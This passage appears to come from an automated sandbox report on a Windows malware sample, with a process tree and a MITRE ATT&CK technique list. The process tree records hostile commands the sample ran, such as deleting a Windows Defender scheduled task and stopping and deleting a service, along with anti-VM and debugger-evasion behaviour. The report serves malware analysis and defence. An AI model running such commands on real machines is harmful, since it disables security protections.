        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        8⤵
        
        PID:5956
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:4180
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        8⤵
        Launches sc.exe
        
        PID:3576

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2344

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5572

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion